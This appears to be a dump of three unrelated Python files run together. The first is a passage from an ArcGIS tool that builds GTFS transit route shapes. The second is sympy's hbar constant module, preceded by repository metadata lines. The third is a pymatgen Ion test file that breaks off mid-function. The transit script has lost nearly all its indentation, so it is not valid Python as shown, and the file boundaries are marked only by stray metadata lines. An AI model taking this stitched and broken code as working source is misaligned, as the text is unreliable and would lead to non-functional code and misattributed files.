arcpy.AddMessage("Generating on-street route shapes for routes of the following types, if they exist in your data:")
for rtype in route_type_Street_textlist:
arcpy.AddMessage(rtype)
arcpy.AddMessage("(This step may take a while for large GTFS datasets.)")
# ----- Writing stops in sequence to feature class for Route input -----
arcpy.AddMessage("- Preparing stops")
# Extract only the sequences we want to make street-based shapes for.
sequences_Streets = []
for sequence in sequence_shape_dict:
shape_id = sequence_shape_dict[sequence]
route_id = sequence[0]
route_type = RouteDict[route_id][4]
if route_type in route_types_Street:
sequences_Streets.append(sequence)
# Chunk the sequences so we don't run out of memory in the Route solver.
ChunkSize = 100
sequences_Streets_chunked = []
for i in range(0, len(sequences_Streets), ChunkSize):
sequences_Streets_chunked.append(sequences_Streets[i:i+ChunkSize])
# Huge loop over each chunk.
totchunks = len(sequences_Streets_chunked)
chunkidx = 1
global NoRouteGenerated
global badStops
unlocated_stops = []
for chunk in sequences_Streets_chunked:
arcpy.AddMessage("- Calculating Routes part %s of %s." % (str(chunkidx), str(totchunks)))
chunkidx += 1
InputRoutePoints = arcpy.management.CreateFeatureclass(outGDB, "TempInputRoutePoints", "POINT", outSequencePoints, "", "", WGSCoords)
# Add the StopPairs table to the feature class.
shapes_in_chunk = []
if useBearing:
# Calculate the bearing value for each stop and insert
with arcpy.da.InsertCursor(InputRoutePoints, ["SHAPE@", "shape_id", "sequence", "CurbApproach", "stop_id", "Bearing", "BearingTol"]) as cur:
for sequence in chunk:
bearingdict = getBearingsForSequence(sequence[1])
shape_id = sequence_shape_dict[sequence]
shapes_in_chunk.append(shape_id)
sequence_num = 1
for stop in sequence[1]:
try:
stopGeom = stopgeom_dict[stop]
try:
Bearing = bearingdict[stop]
except KeyError:
# If we couldn't calculate the bearing for some reason, just leave it as null, and Add Locations will locate it normally.
Bearing = None
except KeyError:
badStops.append(stop)
sequence_num += 1
continue
cur.insertRow((stopGeom, shape_id, sequence_num, CurbApproach, stop, Bearing, BearingTol))
sequence_num += 1
else:
# Insert shapes and location fields
with arcpy.da.InsertCursor(InputRoutePoints, ["SHAPE@X", "SHAPE@Y", "shape_id", "sequence", "CurbApproach", "stop_id", "SourceID", "SourceOID", "PosAlong", "SideOfEdge"]) as cur:
for sequence in chunk:
shape_id = sequence_shape_dict[sequence]
shapes_in_chunk.append(shape_id)
sequence_num = 1
for stop in sequence[1]:
try:
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
SourceID = stoplocfielddict[stop][0]
SourceOID = stoplocfielddict[stop][1]
PosAlong = stoplocfielddict[stop][2]
SideOfEdge = stoplocfielddict[stop][3]
except KeyError:
badStops.append(stop)
sequence_num += 1
continue
cur.insertRow((float(stop_lon), float(stop_lat), shape_id, sequence_num, CurbApproach, stop, SourceID, SourceOID, PosAlong, SideOfEdge))
sequence_num += 1
# ----- Generate routes ------
# Note: The reason we use hierarchy is to ensure that the entire network doesn't get searched
# if a route can't be found between two points
RLayer = arcpy.na.MakeRouteLayer(inNetworkDataset, "TransitShapes", impedanceAttribute,
find_best_order="USE_INPUT_ORDER",
UTurn_policy=UTurns,
restriction_attribute_name=restrictions,
hierarchy="USE_HIERARCHY",
output_path_shape="TRUE_LINES_WITH_MEASURES").getOutput(0)
# To refer to the Route sublayers, get the sublayer names. This is essential for localization.
naSubLayerNames = arcpy.na.GetNAClassNames(RLayer)
stopsSubLayer = naSubLayerNames["Stops"]
# Map fields to ensure that each shape gets its own route.
fieldMappings = arcpy.na.NAClassFieldMappings(RLayer, stopsSubLayer, True)
fieldMappings["RouteName"].mappedFieldName = "shape_id"
fieldMappings["CurbApproach"].mappedFieldName = "CurbApproach"
if not useBearing:
fieldMappings["SourceID"].mappedFieldName = "SourceID"
fieldMappings["SourceOID"].mappedFieldName = "SourceOID"
fieldMappings["PosAlong"].mappedFieldName = "PosAlong"
fieldMappings["SideOfEdge"].mappedFieldName = "SideOfEdge"
# Note: Bearing and BearingTol fields are magically used without explicit field mapping
# See http://desktop.arcgis.com/en/arcmap/latest/extensions/network-analyst/bearing-and-bearingtol-what-are.htm
arcpy.na.AddLocations(RLayer, stopsSubLayer, InputRoutePoints, fieldMappings,
sort_field="sequence",
append="CLEAR")
# Use a simplification tolerance on Solve to reduce the number of vertices
# in the output lines (to make shapes.txt files smaller and to make the
# linear referencing quicker).
simpTol = "2 Meters"
try:
SolvedLayer = arcpy.na.Solve(RLayer, ignore_invalids=True, simplification_tolerance=simpTol)
except:
arcpy.AddWarning("Unable to create on-street Routes because the Solve failed.")
arcpy.AddWarning("Solve warning messages:")
arcpy.AddWarning(arcpy.GetMessages(1))
arcpy.AddWarning("Solve error messages:")
arcpy.AddWarning(arcpy.GetMessages(2))
NoRouteGenerated += shapes_in_chunk
continue
# If any of the routes couldn't be solved, they will leave a warning.
# Save the shape_ids so we can generate straight-line routes for them.
# Similarly, if any stops were skipped because they were unlocated, they will leave a warning.
warnings = arcpy.GetMessages(1)
warninglist = warnings.split("\n")
for w in warninglist:
if re.match('No route for ', w):
thingsInQuotes = re.findall('"(.+?)"', w)
NoRouteGenerated.append(thingsInQuotes[0])
elif re.search(' is unlocated.', w):
thingsInQuotes = re.findall('"(.+?)"', w)
unlocated_stops.append(thingsInQuotes[0])
# Make layer objects for each sublayer we care about.
if ProductName == "ArcGISPro":
RoutesLayer = RLayer.listLayers(naSubLayerNames["Routes"])[0]
else:
RoutesLayer = arcpy.mapping.ListLayers(RLayer, naSubLayerNames["Routes"])[0]
# ----- Save routes to feature class -----
# Uncomment this if you want to save the Stops layer from Route.
##StopsLayer = arcpy.mapping.ListLayers(RLayer, stopsSubLayer)[0]
##arcpy.CopyFeatures_management(StopsLayer, os.path.join(outGDB, "TestOutStops"))
# Save the output routes.
if not arcpy.Exists(outRoutesfc):
arcpy.management.CopyFeatures(RoutesLayer, outRoutesfc)
else:
arcpy.management.Append(RoutesLayer, outRoutesfc)
arcpy.management.Delete(SolvedLayer)
# Add the stop sequences to the final output FC and delete the temporary one.
arcpy.management.Append(InputRoutePoints, outSequencePoints)
arcpy.management.Delete(InputRoutePoints)
if NoRouteGenerated:
arcpy.AddWarning("On-street route shapes for the following shape_ids could \
not be generated. Straight-line route shapes will be generated for these \
shape_ids instead:")
arcpy.AddWarning(sorted(NoRouteGenerated))
arcpy.AddWarning("If you are unhappy with this result, try re-running your \
analysis with a different u-turn policy and/or network restrictions, and check your \
network dataset for connectivity problems.")
if unlocated_stops:
unlocated_stops = sorted(list(set(unlocated_stops)))
arcpy.AddWarning("The following stop_ids could not be located on your network dataset and were skipped when route shapes were generated. \
If you are unhappy with this result, please double-check your stop_lat and stop_lon values in stops.txt and your network dataset geometry \
to make sure everything is correct.")
arcpy.AddWarning(unlocated_stops)
def Generate_Shapes_AGOL():
'''Generate preliminary shapes for each route by calculating the optimal
route along the network using the ArcGIS Online route services.'''
arcpy.AddMessage("Generating on-street route shapes via ArcGIS Online for routes of the following types, if they exist in your data:")
for rtype in route_type_Street_textlist:
arcpy.AddMessage(rtype)
arcpy.AddMessage("(This step may take a while for large GTFS datasets.)")
global NoRouteGenerated
NoRouteGenerated = []
Too_Many_Stops = []
global badStops
# ----- Generate a route for each sequence -----
arcpy.AddMessage("- Generating routes using ArcGIS Online")
# Set up input parameters for route request
service_params = {}
service_params["travelMode"] = AGOLRouteHelper.travel_mode
service_params["returnRoutes"] = True
service_params["outputLines"] = "esriNAOutputLineTrueShapeWithMeasure"
service_params["returnDirections"] = False
service_params["outSR"] = WGSCoords_WKID
# Create the output feature class
arcpy.management.CreateFeatureclass(outGDB, outRoutesfcName, "POLYLINE", '', '', '', WGSCoords)
arcpy.management.AddField(outRoutesfc, "Name", "TEXT")
# Set up insertCursors for output shapes polylines and stop sequences
# Have to open an edit session to have two simultaneous InsertCursors.
edit = arcpy.da.Editor(outGDB)
ucursor = arcpy.da.InsertCursor(outRoutesfc, ["SHAPE@", "Name"])
cur = arcpy.da.InsertCursor(outSequencePoints, ["SHAPE@X", "SHAPE@Y", "shape_id", "sequence", "stop_id", "CurbApproach", "Bearing", "BearingTol"])
edit.startEditing()
# Generate routes with AGOL for sequences we want to make street-based shapes for.
sequences_Streets = []
num_shapes = len(sequence_shape_dict)
next_threshold = 10
progress = 0.0
num_routes_calculated = 0
for sequence in sequence_shape_dict:
# Print some progress indicators
progress += 1
percdone = (progress / num_shapes) * 100
if percdone > next_threshold:
last_threshold = percdone - percdone%10
arcpy.AddMessage("%s%% finished" % str(int(last_threshold)))
next_threshold = last_threshold + 10
shape_id = sequence_shape_dict[sequence]
route_id = sequence[0]
route_type = RouteDict[route_id][4]
if route_type not in route_types_Street:
continue
if len(sequence[1]) > AGOLRouteHelper.route_stop_limit:
# There are too many stops in this route to solve with the online services.
Too_Many_Stops.append(shape_id)
continue
bearingdict = getBearingsForSequence(sequence[1])
sequence_num = 1
pt = arcpy.Point()
features = []
for stop in sequence[1]:
try:
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
except KeyError:
badStops.append(stop)
sequence_num += 1
continue
# Add stop sequences to points fc for user to look at.
pt.X = float(stop_lon)
pt.Y = float(stop_lat)
cur.insertRow((float(stop_lon), float(stop_lat), shape_id, sequence_num, stop, CurbApproach, bearingdict[stop], BearingTol))
sequence_num = sequence_num + 1
geom = {"x": float(stop_lon),
"y": float(stop_lat),
"spatialReference": {"wkid": WGSCoords_WKID}}
attributes = {"Name": stop,
"CurbApproach": CurbApproach}
if bearingdict[stop] != None:
attributes["Bearing"] = bearingdict[stop]
attributes["BearingTol"] = BearingTol
features.append({"geometry": geom, "attributes": attributes})
service_params["stops"] = {"features": features}
routeshapes, errors = AGOLRouteHelper.generate_routes_from_AGOL_as_polylines(AGOLRouteHelper.token, service_params)
if errors:
if "User does not have permissions to access" in errors:
arcpy.AddError("ArcGIS Online route generation failed. Please ensure that your ArcGIS Online account \
has routing privileges and sufficient credits for this analysis.")
raise CustomError
arcpy.AddWarning("ArcGIS Online route generation for shape_id %s failed. A straight-line shape will be generated for this shape_id instead. %s" % (shape_id, errors))
NoRouteGenerated.append(shape_id)
continue
for route in routeshapes: # actually, only one shape should be returned here, but loop just in case
ucursor.insertRow((route, shape_id))
num_routes_calculated += 1
del ucursor
del cur
edit.stopEditing(True)
arcpy.AddMessage("Done generating route shapes with ArcGIS Online. Number of ArcGIS Online routes calculated: %s" % str(num_routes_calculated))
if Too_Many_Stops:
arcpy.AddWarning("On-street route shapes for the following shape_ids could \
not be generated because the number of stops in the route exceeds the ArcGIS Online \
service limit of %s stops. Straight-line route shapes will be generated for these \
shape_ids instead:" % str(AGOLRouteHelper.route_stop_limit))
arcpy.AddWarning(sorted(Too_Many_Stops))
NoRouteGenerated.extend(Too_Many_Stops)  # extend with the individual shape_ids so the straight-line fallback picks them up
def Generate_Shapes_Straight(Created_Street_Output):
'''Generate route shapes as straight lines between stops.'''
arcpy.AddMessage("Generating straight-line route shapes for routes of the following types, if they exist in your data:")
for rtype in route_type_Straight_textlist:
arcpy.AddMessage(rtype)
arcpy.AddMessage("(This step may take a while for large GTFS datasets.)")
# If we didn't already create the output feature class with the Street-based routes, create it now.
if not Created_Street_Output or not arcpy.Exists(outRoutesfc):
arcpy.management.CreateFeatureclass(outGDB, outRoutesfcName, "POLYLINE", '', "ENABLED", "DISABLED", WGSCoords)
arcpy.management.AddField(outRoutesfc, "Name", "TEXT")
spatial_ref = WGSCoords
else:
spatial_ref = arcpy.Describe(outRoutesfc).spatialReference
# ----- Create polylines using stops as vertices -----
# Set up insertCursors for output shapes polylines and stop sequences
# Have to open an edit session to have two simultaneous InsertCursors.
edit = arcpy.da.Editor(outGDB)
ucursor = arcpy.da.InsertCursor(outRoutesfc, ["SHAPE@", "Name"])
cur = arcpy.da.InsertCursor(outSequencePoints, ["SHAPE@X", "SHAPE@Y", "shape_id", "sequence", "stop_id"])
edit.startEditing()
global badStops
for sequence in sequence_shape_dict:
shape_id = sequence_shape_dict[sequence]
route_id = sequence[0]
route_type = RouteDict[route_id][4]
if route_type in route_types_Straight or shape_id in NoRouteGenerated:
sequence_num = 1
# Add stop sequence to an Array of Points
array = arcpy.Array()
pt = arcpy.Point()
for stop in sequence[1]:
try:
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
except KeyError:
if shape_id not in NoRouteGenerated:
# Don't repeat a warning if they already got it once.
badStops.append(stop)
sequence_num += 1
continue
pt.X = float(stop_lon)
pt.Y = float(stop_lat)
pt.M = sequence_num - 1 # Insert dummy M value
# Add stop sequences to points fc for user to look at.
cur.insertRow((float(stop_lon), float(stop_lat), shape_id, sequence_num, stop))
sequence_num = sequence_num + 1
array.add(pt)
# Generate a Polyline from the Array of stops
polyline = arcpy.Polyline(array, WGSCoords, None, True)
# Project the polyline to the correct output coordinate system.
if spatial_ref != WGSCoords:
polyline = polyline.projectAs(spatial_ref)  # projectAs returns a new geometry; reassign to keep the projected copy
# Add the polyline to the Shapes feature class
ucursor.insertRow((polyline, shape_id))
del ucursor
del cur
edit.stopEditing(True)
def connect_to_sql(SQLDbase):
global c, conn
conn = sqlite3.connect(SQLDbase)
c = conn.cursor()
def check_Arc_version(useAGOL=False, useNA=False):
'''Check that the user has a version of ArcGIS that can support this tool.'''
ArcVersionInfo = arcpy.GetInstallInfo("desktop")
ArcVersion = ArcVersionInfo['Version']
global ProductName
ProductName = ArcVersionInfo['ProductName']
global useBearing
if ProductName == "ArcGISPro":
if ArcVersion in ["1.0", "1.1", "1.1.1"]:
arcpy.AddError("You must have ArcGIS Pro 1.2 or higher to run this \
tool. You have ArcGIS Pro version %s." % ArcVersion)
raise CustomError
if useNA and ArcVersion in ["1.0", "1.0.1", "1.0.2", "1.1", "1.1.1", "1.2", "1.3", "1.3.1", "1.4", "1.4.1"]:
# Bearing and BearingTol fields did not work until Pro 2.0.
arcpy.AddWarning("Warning! Certain functionality was implemented in ArcGIS Pro 2.0 that \
significantly improves the output of this tool. For better results, upgrade to the latest version of ArcGIS Pro or run \
this tool with ArcMap version 10.3 or higher.")
useBearing = False
else:
if ArcVersion == "10.0":
arcpy.AddError("You must have ArcGIS 10.2.1 or higher (or ArcGIS Pro) to run this \
tool. You have ArcGIS version %s." % ArcVersion)
raise CustomError
if ArcVersion in ["10.1", "10.2"]:
arcpy.AddWarning("Warning! You can run Step 1 of this tool in \
ArcGIS 10.1 or 10.2, but you will not be able to run Step 2 without ArcGIS \
10.2.1 or higher (or ArcGIS Pro). You have ArcGIS version %s." % ArcVersion)
if useNA:
useBearing = False
if useAGOL and ArcVersion in ["10.2.1", "10.2.2"]:
arcpy.AddError("You must have ArcGIS 10.3 (or ArcGIS Pro) to run the ArcGIS Online \
version of this tool. You have ArcGIS version %s." % ArcVersion)
raise CustomError
if useNA and ArcVersion in ["10.2.1", "10.2.2"]:
arcpy.AddWarning("Warning! This version of Step 1 will produce significantly \
better output using ArcGIS version 10.3 or higher or ArcGIS Pro 2.0 or higher. You have ArcGIS version %s." % ArcVersion)
useBearing = False
def get_stop_lat_lon():
'''Populate a dictionary of {stop_id: [stop_lat, stop_lon]}'''
arcpy.AddMessage("Collecting and processing GTFS stop information...")
# Find all stops with lat/lon
global stoplatlon_dict
stoplatlon_dict = {}
cs = conn.cursor()
stoplatlonfetch = '''
SELECT stop_id, stop_lat, stop_lon FROM stops
;'''
cs.execute(stoplatlonfetch)
for stop in cs:
# Add stop lat/lon to dictionary
stoplatlon_dict[stop[0]] = [stop[1], stop[2]]
def get_stop_geom():
'''Populate a dictionary of {stop_id: stop point geometry object}'''
global stopgeom_dict
stopgeom_dict = {}
for stop in stoplatlon_dict:
lat = stoplatlon_dict[stop][0]
lon = stoplatlon_dict[stop][1]
point = arcpy.Point(lon, lat)
ptGeometry = arcpy.PointGeometry(point, WGSCoords)
stopgeom_dict[stop] = ptGeometry
def getBearingsForSequence(sequence):
'''Populate a dictionary of {stop_id: bearing}. Applies only to a given stop sequence. The same stop
could have a different bearing if visited by a trip with a different shape.'''
bearingdict = {}
previous_angle = None
for idx in range(len(sequence)):
try:
current_stop = sequence[idx]
if idx == len(sequence)-1:
# This is the last stop in the sequence, so just use the previous angle as the bearing.
bearingdict[current_stop] = previous_angle
angle_to_next = None
else:
# Calculate the angle from this stop to the next one in the sequence
current_stop_geom = stopgeom_dict[current_stop]
next_stop_geom = stopgeom_dict[sequence[idx+1]]
# Note: angleAndDistanceTo was added in ArcGIS 10.3
angle_to_next = current_stop_geom.angleAndDistanceTo(next_stop_geom, "GEODESIC")[0]
if previous_angle == None:
# This is the first stop, so use the angle to the second stop as the bearing
bearingdict[current_stop] = angle_to_next
else:
# If this is an intermediate stop, estimate the bearing based on the angle between this stop and the previous and next one
# If the angle to the next one and the angle from the previous one are very different, the route is probably going around a corner,
# and we can't reliably estimate what the bearing should be by averaging, so don't try to use a bearing for this one.
diff = abs(angle_to_next - previous_angle)
if diff >= MaxAngle:
bearingdict[current_stop] = None
else:
# If they're sufficiently similar angles, use some trigonometry to average the angle from the previous stop to this one and the angle of this one to the next one
angle_to_next_rad = np.deg2rad(angle_to_next)
previous_angle_rad = np.deg2rad(previous_angle)
bearing = np.rad2deg(np.arctan2((np.sin(previous_angle_rad) + np.sin(angle_to_next_rad))/2, (np.cos(previous_angle_rad) + np.cos(angle_to_next_rad))/2))
bearingdict[current_stop] = bearing
previous_angle = angle_to_next
except KeyError as err:
arcpy.AddWarning("Key error in getBearingsForSequence")
arcpy.AddWarning(err)
continue
return bearingdict
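# A hedged, illustrative sketch (this helper is hypothetical and is never called by the
# tool): the intermediate-stop bearing computed above is a circular mean of two compass
# angles, taken on unit vectors so that, for example, 350 and 10 degrees average to 0
# rather than 180.
def _example_circular_mean(angle1_deg, angle2_deg):
    '''Return the circular mean (in degrees) of two bearings, mirroring the averaging in getBearingsForSequence().'''
    a1 = np.deg2rad(angle1_deg)
    a2 = np.deg2rad(angle2_deg)
    return np.rad2deg(np.arctan2((np.sin(a1) + np.sin(a2)) / 2.0, (np.cos(a1) + np.cos(a2)) / 2.0))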
def calculate_stop_location_fields():
'''Calculate location fields for the stops and save them to a dictionary so that Network Analyst Add Locations will be faster later'''
arcpy.AddMessage("Calculating network locations fields...")
# Temporary feature class of stops for calculating location fields
arcpy.management.CreateFeatureclass(outGDB, "TempStopswLocationFields", "POINT", "", "", "", WGSCoords)
LocFieldStops = os.path.join(outGDB, "TempStopswLocationFields")
arcpy.management.AddField(LocFieldStops, "stop_id", "TEXT")
with arcpy.da.InsertCursor(LocFieldStops, ["SHAPE@X", "SHAPE@Y", "stop_id"]) as cur:
for stop in stoplatlon_dict:
# Insert stop into fc for location field calculation
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
cur.insertRow((float(stop_lon), float(stop_lat), stop))
# It would be easier to use CalculateLocations, but then we can't
# exclude restricted network elements.
# Instead, create a dummy Route layer and Add Locations
RLayer = arcpy.na.MakeRouteLayer(inNetworkDataset, "DummyLayer", impedanceAttribute,
restriction_attribute_name=restrictions).getOutput(0)
naSubLayerNames = arcpy.na.GetNAClassNames(RLayer)
stopsSubLayer = naSubLayerNames["Stops"]
fieldMappings = arcpy.na.NAClassFieldMappings(RLayer, stopsSubLayer)
fieldMappings["Name"].mappedFieldName = "stop_id"
arcpy.na.AddLocations(RLayer, stopsSubLayer, LocFieldStops, fieldMappings,
search_criteria=search_criteria,
snap_to_position_along_network="NO_SNAP",
exclude_restricted_elements="EXCLUDE")
if ProductName == "ArcGISPro":
StopsLayer = RLayer.listLayers(stopsSubLayer)[0]
else:
StopsLayer = arcpy.mapping.ListLayers(RLayer, stopsSubLayer)[0]
# Iterate over the located stops and create a dictionary of location fields
global stoplocfielddict
stoplocfielddict = {}
with arcpy.da.SearchCursor(StopsLayer, ["Name", "SourceID", "SourceOID", "PosAlong", "SideOfEdge"]) as cur:
for stop in cur:
locfields = [stop[1], stop[2], stop[3], stop[4]]
stoplocfielddict[stop[0]] = locfields
arcpy.management.Delete(StopsLayer)
arcpy.management.Delete(LocFieldStops)
def get_route_info():
'''Create a dictionary of {route_id: [all route.txt fields + route_type_text]}'''
arcpy.AddMessage("Collecting GTFS route information...")
# GTFS route_type information
#0 - Tram, Streetcar, Light rail. Any light rail or street level system within a metropolitan area.
#1 - Subway, Metro. Any underground rail system within a metropolitan area.
#2 - Rail. Used for intercity or long-distance travel.
#3 - Bus. Used for short- and long-distance bus routes.
#4 - Ferry. Used for short- and long-distance boat service.
#5 - Cable car. Used for street-level cable cars where the cable runs beneath the car.
#6 - Gondola, Suspended cable car. Typically used for aerial cable cars where the car is suspended from the cable.
#7 - Funicular. Any rail system designed for steep inclines.
route_type_dict = {0: "Tram, Streetcar, Light rail",
1: "Subway, Metro",
2: "Rail",
3: "Bus",
4: "Ferry",
5: "Cable car",
6: "Gondola, Suspended cable car",
7: "Funicular"}
# Find all routes and associated info.
global RouteDict
RouteDict = {}
cr = conn.cursor()
routesfetch = '''
SELECT route_id, agency_id, route_short_name, route_long_name,
route_desc, route_type, route_url, route_color, route_text_color
FROM routes
;'''
cr.execute(routesfetch)
for route in cr:
# {route_id: [all route.txt fields + route_type_text]}
try:
route_type = route[5]
route_type_text = route_type_dict[int(route_type)]
except:
route_type = 100
route_type_text = "Other / Type not specified"
RouteDict[route[0]] = [route[1], route[2], route[3], route[4], route_type,
route[6], route[7], route[8],
route_type_text]
def get_trip_route_info():
'''Create a dictionary of {trip_id: route_id}'''
global trip_route_dict
trip_route_dict = {}
ctr = conn.cursor()
triproutefetch = '''
SELECT trip_id, route_id FROM trips
;'''
ctr.execute(triproutefetch)
for triproute in ctr:
# {trip_id: route_id}
trip_route_dict[triproute[0]] = triproute[1]
def get_trips_with_shape_id(shape):
'''Return a list of trip_ids that use the specified shape'''
tripsfetch = '''SELECT trip_id FROM trips WHERE shape_id="%s";''' % shape
c.execute(tripsfetch)
trips = c.fetchall()
return [trip[0] for trip in trips]
def get_trip_stop_sequence(trip_id):
'''Return a sequence of stop_id values, in the correct order, for a given trip'''
stopfetch = "SELECT stop_id, stop_sequence FROM stop_times WHERE trip_id='%s'" % trip_id
c.execute(stopfetch)
selectedstops = c.fetchall()
# Sort the stop list by sequence.
selectedstops.sort(key=operator.itemgetter(1))
stop_sequence = ()
for stop in selectedstops:
stop_sequence += (stop[0],)
return stop_sequence
def get_unique_stop_sequences():
'''Find the unique sequences of stops from stop_times.txt. Each unique sequence is a new shape.'''
arcpy.AddMessage("Calculating unique sequences of stops...")
# Find all trip_ids.
ct = conn.cursor()
tripsfetch = '''
SELECT DISTINCT trip_id FROM stop_times
;'''
ct.execute(tripsfetch)
# Select stops in that trip
global sequence_shape_dict, shape_trip_dict
sequence_shape_dict = {}
shape_trip_dict = {}
shape_id = 1
for trip in ct:
stop_sequence = get_trip_stop_sequence(trip[0])
route_id = trip_route_dict[trip[0]]
sequence_shape_dict_key = (route_id, stop_sequence)
try:
sh = sequence_shape_dict[sequence_shape_dict_key]
shape_trip_dict.setdefault(sh, []).append(trip[0])
except KeyError:
sequence_shape_dict[sequence_shape_dict_key] = str(shape_id)
shape_trip_dict.setdefault(str(shape_id), []).append(trip[0])
shape_id += 1
numshapes = shape_id - 1
arcpy.AddMessage("Your GTFS data contains %s unique shapes." % str(numshapes))
def append_existing_shape_to_fc(shape, StopsCursor, route=None):
if route:
# Retrieve route info for final output file.
route_short_name = RouteDict[route][1]
route_long_name = RouteDict[route][2]
if RouteDict[route][3]:
route_desc = RouteDict[route][3][:max_route_desc_length]
else:
route_desc = ""
route_type = RouteDict[route][4]
route_type_text = RouteDict[route][8]
else:
# Couldn't get route info for this shape
route = ""
route_short_name = ""
route_long_name = ""
route_desc = ""
route_type = 0
route_type_text = ""
# Fetch the shape info to create the polyline feature.
cp = conn.cursor()
pointsinshapefetch = '''
SELECT shape_pt_lat, shape_pt_lon FROM shapes
WHERE shape_id='%s'
ORDER BY shape_pt_sequence;''' % shape
cp.execute(pointsinshapefetch)
# Create the polyline feature from the sequence of points
polyline = [(float(point[1]), float(point[0])) for point in cp]
# Add the polyline feature to the output feature class
StopsCursor.insertRow((polyline, shape, route,
route_short_name, route_long_name, route_desc,
route_type, route_type_text,))
|
sympy/physics/quantum/constants.py
|
shipci/sympy
| 319 |
67778
|
"""Constants (like hbar) related to quantum mechanics."""
from __future__ import print_function, division
from sympy.core.numbers import NumberSymbol
from sympy.core.singleton import Singleton
from sympy.core.compatibility import u, with_metaclass
from sympy.printing.pretty.stringpict import prettyForm
import sympy.mpmath.libmp as mlib
#-----------------------------------------------------------------------------
# Constants
#-----------------------------------------------------------------------------
__all__ = [
'hbar'
]
class HBar(with_metaclass(Singleton, NumberSymbol)):
"""Reduced Plank's constant in numerical and symbolic form [1]_.
Examples
========
>>> from sympy.physics.quantum.constants import hbar
>>> hbar.evalf()
1.05457162000000e-34
References
==========
.. [1] http://en.wikipedia.org/wiki/Planck_constant
"""
is_real = True
is_positive = True
is_negative = False
is_irrational = True
__slots__ = []
def _as_mpf_val(self, prec):
return mlib.from_float(1.05457162e-34, prec)
def _sympyrepr(self, printer, *args):
return 'HBar()'
def _sympystr(self, printer, *args):
return 'hbar'
def _pretty(self, printer, *args):
if printer._use_unicode:
return prettyForm(u('\u210f'))
return prettyForm('hbar')
def _latex(self, printer, *args):
return r'\hbar'
# Create an instance for everyone to use.
hbar = HBar()
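# Minimal usage sketch (the symbols below are invented for illustration and are not part
# of this module): hbar behaves like any other SymPy NumberSymbol, so it can appear in
# symbolic expressions and be substituted or evaluated like ordinary constants.
#     >>> from sympy import symbols
#     >>> E, omega = symbols('E omega', positive=True)
#     >>> n = E/(hbar*omega)      # dimensionless ratio
#     >>> n.subs(E, 2*hbar*omega)
#     2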
|
pymatgen/core/tests/test_ion.py
|
chunweizhu/pymatgen
| 921 |
67787
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import random
import unittest
from pymatgen.core.composition import Composition
from pymatgen.core.ion import Ion
from pymatgen.core.periodic_table import Element
class IonTest(unittest.TestCase):
def setUp(self):
self.comp = []
self.comp.append(Ion.from_formula("Li+"))
self.comp.append(Ion.from_formula("MnO4-"))
self.comp.append(Ion.from_formula("Mn++"))
self.comp.append(Ion.from_formula("PO3-2"))
self.comp.append(Ion.from_formula("Fe(CN)6-3"))
self.comp.append(Ion.from_formula("Fe(CN)6----"))
self.comp.append(Ion.from_formula("Fe2((PO4)3(CO3)5)2-3"))
self.comp.append(Ion.from_formula("Ca[2+]"))
self.comp.append(Ion.from_formula("NaOH(aq)"))
def test_init_(self):
c = Composition({"Fe": 4, "O": 16, "P": 4})
charge = 4
self.assertEqual("Fe4 P4 O16 +4", Ion(c, charge).formula)
f = {1: 1, 8: 1}
charge = -1
self.assertEqual("H1 O1 -1", Ion(Composition(f), charge).formula)
self.assertEqual("S2 O3 -2", Ion(Composition(S=2, O=3), -2).formula)
def test_formula(self):
correct_formulas = [
"Li1 +1",
"Mn1 O4 -1",
"Mn1 +2",
"P1 O3 -2",
"Fe1 C6 N6 -3",
"Fe1 C6 N6 -4",
"Fe2 P6 C10 O54 -3",
"Ca1 +2",
"Na1 H1 O1",
]
all_formulas = [c.formula for c in self.comp]
self.assertEqual(all_formulas, correct_formulas)
self.assertRaises(ValueError, Ion.from_formula, "(co2)(po4)2")
def test_mixed_valence(self):
comp = Ion(Composition({"Fe2+": 2, "Fe3+": 4, "Li+": 8}))
self.assertEqual(comp.reduced_formula, "Li4Fe3(aq)")
self.assertEqual(comp.alphabetical_formula, "Fe6 Li8")
self.assertEqual(comp.formula, "Li8 Fe6")
def test_alphabetical_formula(self):
correct_formulas = [
"Li1 +1",
"Mn1 O4 -1",
"Mn1 +2",
"O3 P1 -2",
"C6 Fe1 N6 -3",
"C6 Fe1 N6 -4",
"C10 Fe2 O54 P6 -3",
"Ca1 +2",
"H1 Na1 O1",
]
all_formulas = [c.alphabetical_formula for c in self.comp]
self.assertEqual(all_formulas, correct_formulas)
def test_num_atoms(self):
correct_num_atoms = [1, 5, 1, 4, 13, 13, 72, 1, 3]
all_natoms = [c.num_atoms for c in self.comp]
self.assertEqual(all_natoms, correct_num_atoms)
def test_anonymized_formula(self):
expected_formulas = [
"A+1",
"AB4-1",
"A+2",
"AB3-2",
"AB6C6-3",
"AB6C6-4",
"AB3C5D27-3",
"A+2",
"ABC",
]
for i in range(len(self.comp)):
self.assertEqual(self.comp[i].anonymized_formula, expected_formulas[i])
def test_from_dict(self):
sym_dict = {"P": 1, "O": 4, "charge": -2}
self.assertEqual(
Ion.from_dict(sym_dict).reduced_formula,
"PO4[2-]",
"Creation form sym_amount dictionary failed!",
)
def test_as_dict(self):
c = Ion.from_dict({"Mn": 1, "O": 4, "charge": -1})
d = c.as_dict()
correct_dict = {"Mn": 1.0, "O": 4.0, "charge": -1.0}
self.assertEqual(d, correct_dict)
self.assertEqual(d["charge"], correct_dict["charge"])
correct_dict = {"Mn": 1.0, "O": 4.0, "charge": -1}
d = c.to_reduced_dict
self.assertEqual(d, correct_dict)
self.assertEqual(d["charge"], correct_dict["charge"])
def test_equals(self):
random_z = random.randint(1, 92)
fixed_el = Element.from_Z(random_z)
other_z = random.randint(1, 92)
while other_z == random_z:
other_z = random.randint(1, 92)
comp1 = Ion(Composition({fixed_el: 1, Element.from_Z(other_z): 0}), 1)
other_z = random.randint(1, 92)
while other_z == random_z:
other_z = random.randint(1, 92)
comp2 = Ion(Composition({fixed_el: 1, Element.from_Z(other_z): 0}), 1)
self.assertEqual(
comp1,
comp2,
"Composition equality test failed. " + "%s should be equal to %s" % (comp1.formula, comp2.formula),
)
self.assertEqual(comp1.__hash__(), comp2.__hash__(), "Hashcode equality test failed!")
def test_equality(self):
